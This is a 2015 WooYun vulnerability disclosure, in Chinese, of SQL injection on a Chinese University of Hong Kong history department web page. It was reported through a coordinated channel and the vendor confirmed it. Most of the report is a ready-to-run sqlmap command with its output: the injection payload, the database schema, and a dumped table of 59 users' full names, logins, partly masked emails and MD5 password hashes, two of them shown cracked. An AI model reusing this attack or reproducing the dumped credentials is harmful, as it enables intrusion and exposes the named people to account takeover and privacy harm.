当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148646

漏洞标题:香港中文大學歷史系某處存在SQL插入攻擊(可獲得多名用戶名字,郵箱及密碼等信息)(香港地區)

相关厂商:香港中文大學

漏洞作者: 路人甲

提交时间:2015-10-22 19:05

修复时间:2015-12-10 11:00

公开时间:2015-12-10 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

香港中文大學歷史系某處存在SQL插入攻擊(可獲得多名用戶名字,郵箱及密碼等信息)

详细说明:

測試地址:http://**.**.**.**/201415_hist6011d.html?id=2706

python sqlmap.py -u "http://**.**.**.**/201415_hist6011d.html?id=2706" -p id --technique=B --threads=10  -D d5cms -T d5_member -C fullName,email,login,password --dump

漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2706 AND 5599=5599
---
web server operating system: Windows
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
available databases [3]:
[*] d5cms
[*] information_schema
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2706 AND 5599=5599
---
web server operating system: Windows
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
Database: d5cms
[9 tables]
+-------------------------+
| d5_c_color_scheme       |
| d5_c_status             |
| d5_c_type               |
| d5_forms                |
| d5_generic_content      |
| d5_member               |
| d5_tags                 |
| d5_userlevelpermissions |
| d5_userlevels           |
+-------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2706 AND 5599=5599
---
web server operating system: Windows
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
Database: d5cms
Table: d5_member
[11 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| activated      | tinyint(4)            |
| cms_memo       | text                  |
| email          | varchar(250)          |
| fullName       | varchar(100)          |
| login          | varchar(20)           |
| memID          | mediumint(9) unsigned |
| parentID       | mediumint(9) unsigned |
| password       | varchar(32)           |
| RestrictIP     | varchar(15)           |
| RestrictIPMask | varchar(15)           |
| role           | int(1)                |
+----------------+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2706 AND 5599=5599
---
web server operating system: Windows
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
Database: d5cms
Table: d5_member
[59 entries]
+-----------------------+---------------------------------+--------------------+---------------------------------------------+
| fullName              | email                           | login              | password                                    |
+-----------------------+---------------------------------+--------------------+---------------------------------------------+
| Site Admin 002        | NULL                            | hisadmin2          | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) |
| Site admin 003        | NULL                            | hisadmin3          | ae2b1fca515949e5d54fb22b8ed95575 (testing)  |
| admin_group           | NULL                            | admin_group        | a645823d50f171b89ea4cf12467f9a24            |
| Newsletter Editor     | NULL                            | newsletter         | 0ca82c9c3cf7a1d9df2e75b3dca51962            |
| Event Lists Editor    | NULL                            | eventlist          | e255a233023d19ef0c1f5a14a3bb027d            |
| MA Programme Editor   | NULL                            | maoffice           | c425b318a30df84f552e6de09d194a30            |
| WANG Hongmei          | 12210100004@**.**.**.**        | 12210100004        | 6eeb32389b3a2b3c832f0bcb1408b41f            |
| HUANG Yawen           | 395302103@**.**.**.**                | 395302103          | 293d317028c08c0e1a206d443cefb620            |
| CHEN Haili            | 446450844@**.**.**.**                | 446450844          | a90ca0fca93083cf76fa1546d12c31d7            |
| LI Hua                | 470422323@**.**.**.**                | 470422323          | a62ea376c8edf9ee7a17c3ccf12161fc            |
| XU Fei                | 58274560@**.**.**.**                 | 58274560           | f7db6466a72df25f17677b4d2c99df10            |
| NG Yee Ka             | abby-0920@**.**.**.**           | abby-0920          | fasfsa                                      |
| LO Chi Kei            | archkei@**.**.**.**               | archkei            | 863e5b53da2348c7d02ae563390da079            |
| Paul Lau              | b135635@**.**.**.**             | paullau            | 34c9b30c57e09cc0068e5e194972d6c4            |
| BAK Jia How           | bakjiahow@**.**.**.**             | bakjiahow          | 8859f1794df37d87d5a25f3e50c51f13            |
| JIANG Benmo           | benmo1988@**.**.**.**             | benmo1988          | a23af270af777ec9cb09332f2c77a74d            |
| CHAN Sai Leong        | chansaileong@**.**.**.**        | chansaileong       | 48d89b61a7eb9208846545fedba3a347            |
| TSE Hiu Tung          | ctse1990@**.**.**.**         | ctse1990           | 939c4e8e36b53a9c3912ac505cdc112d            |
| CHEUNG Wai Hin Justin | cwhjustin@**.**.**.**             | cwhjustin          | 07596c0036934dd85e23c108b310974b            |
| LAM Ngai Chung        | derekexactly@**.**.**.**          | derekexactly       | d8422939e9b586370765fc7a445d6778            |
| DENG Lingling         | dll1125@**.**.**.**                 | dll1125            | a8b2bfe671e17a7fa8f8a30c8ec688ed            |
| Emily CHEUNG          | emilycheung@arts.**.**.**.**    | emilycheung        | 4a66774266b2a3175efa322332daeaf1            |
| CHEN Ruochen          | gabbychen.his@**.**.**.**         | gabbychen.his      | d6b33c26ea63a6a81e842fd0fca94cf1            |
| User Admin            | hiswebadmin@**.**.**.**         | useradmin          | 95f40af25662c9aefb95427d1dc800b2            |
| WEN Yadi              | hrb_yang@**.**.**.**                | hrb_yang           | 2d9dd052165f66c36e96d7e7bc951864            |
| XU Guanmian           | hugo__xu@**.**.**.**            | hugo__xu           | fasfsa                                      |
| WANG Hui              | hui.hui.wang@**.**.**.**        | hui.hui.wang       | 7f38ee64cbc2b20ec3f9e3ac799d689a            |
| Jennifer              | jennifercheung@arts.**.**.**.** | jennifercheung     | bbca0037e0ab61e49b2f2b7f1b7d7d77            |
| Jessie WOO            | jessiewoo@arts.**.**.**.**      | jessiewoo          | 73a0816ee51c2d804d92bcb866a10ba2            |
| CHIU Chung Wai Vito   | jiuwai@**.**.**.**                | jiuwai             | ff7bdd58943a92863f7e52894d676fc3            |
| XU Shibo              | justininchina@**.**.**.**            | justininchina      | fasfsa                                      |
| KAN Xuqiang           | kanxuqiang1989@**.**.**.**          | kanxuqiang1989     | ea3186d4d17d8b09f756f0cad389fbc8            |
| LEE Kai Chun Katon    | katonkclee@**.**.**.**            | katonkclee         | 839d5b2debb79e47dea5bbdc1a82fb6e            |
| SIU Kam Wah Joseph    | kwsiu@arts.**.**.**.**          | kwsiu              | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) |
| KWAN Tsz Long         | leo_kwan3406@**.**.**.**       | leo_kwan3406       | 1f4f9fb12bd354cadcc69072e883a3b9            |
| LEE Chih-hsien        | lester.ch@**.**.**.**             | lester.ch          | 5ffbdfb7a0ab7d9a024c33a07c3e0523            |
| LING Yan              | lingxiaoceng@**.**.**.**          | lingxiaoceng       | baa573453e0f46be2c305d5de53e5484            |
| LIU Yichen            | liuyc037@**.**.**.**            | liuyc037           | b418d6575ddfcc1c9c874b409b50ec56            |
| LI Zigui              | liziguihk@**.**.**.**             | liziguihk          | cf02de50e92ee621799d604eab3935c7            |
| MA Muk Chi            | mamukchi@arts.**.**.**.**       | mamukchi           | 770e9cd63df9452ec6524c7c84d7a3f0            |
| MAO Di                | maoyaya0905@**.**.**.**           | maoyaya0905        | 809c5f9ab20d9dc4dc21aa94102cab2a            |
| CHAI Xiuli            | meryltry@**.**.**.**              | meryltry           | 3021110d582aacd393516956f41b7b7c            |
| Michael LEE           | michaellee@**.**.**.**          | michaellee         | 6e09cfc750dff71d08120d97ac78503a            |
| CHEUNG Tung           | misha_rabi_en_rose@**.**.**.** | misha_rabi_en_rose | dbdae823a526411fa01681ec8a06f2fc            |
| CHENG Boli            | paulinecheng0214@**.**.**.**    | paulinecheng0214   | 87e024774e781fb448c136d71ed6fd46            |
| Site admin 001        | paullau@arts.**.**.**.**        | hisadmin           | 95f40af25662c9aefb95427d1dc800b2            |
| CHEN Qin              | qinsepipa0718@**.**.**.**           | qinsepipa0718      | 80a89535ee45c70d65e9bda5d01730dd            |
| ZHOU Shuzhe           | ravi91127@**.**.**.**             | ravi91127          | c9056c43f50b6599be4d7ca49afcc769            |
| YANG Songyu           | songyu88yang@**.**.**.**        | songyu88yang       | 39025800b8f950116e839fc6910c8092            |
| LO Shuk Ying          | sylo@arts.**.**.**.**           | sylo               | e4ad0793429080b17554918e26bff610            |
| CHEN Jing             | taoyangtianyu@**.**.**.**           | taoyangtianyu      | 21a3289e47718db6ee6e32f277b023c0            |
| TIAN Fang             | tianfang19880701@**.**.**.**        | tianfang19880701   | d21ed5c0fea6bb7a81373a1d55caae8e            |
| PENG Yongchang        | tongdaner@**.**.**.**             | tongdaner          | 31d4dde6f33bbd2ffe2863c3affc1778            |
| WANG Jiayao           | wang00372008@**.**.**.**          | wang00372008       | b78d2c45e5de3683bb0dd914a6eb9d24            |
| PUK Wing Kin          | wkpuk@arts.**.**.**.**          | wkpuk              | 192953af31ee406d9506b925f45a13c9            |
| LUI Wing Sing         | wslui@arts.**.**.**.**          | wslui              | 20b5340dde0e0ce3740e5ad2237d0a0c            |
| REN Yaxuan            | yaxuan.ren@**.**.**.**            | yaxuan.ren         | fasfsa                                      |
| LAW Yuet Ying         | yylaw1234@**.**.**.**             | yylaw1234          | dd3ecd8dc6c2bc7b65d5c27da03df7b3            |
| ZHANG Yan             | zhangyan-zouping@**.**.**.**        | zhangyan-zouping   | 8358cdbfc2e886b8c30477ba41a5de07            |
+-----------------------+---------------------------------+--------------------+---------------------------------------------+

修复方案:

過濾。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-26 10:59

厂商回复:

已聯絡相關機構處理

最新状态:

暂无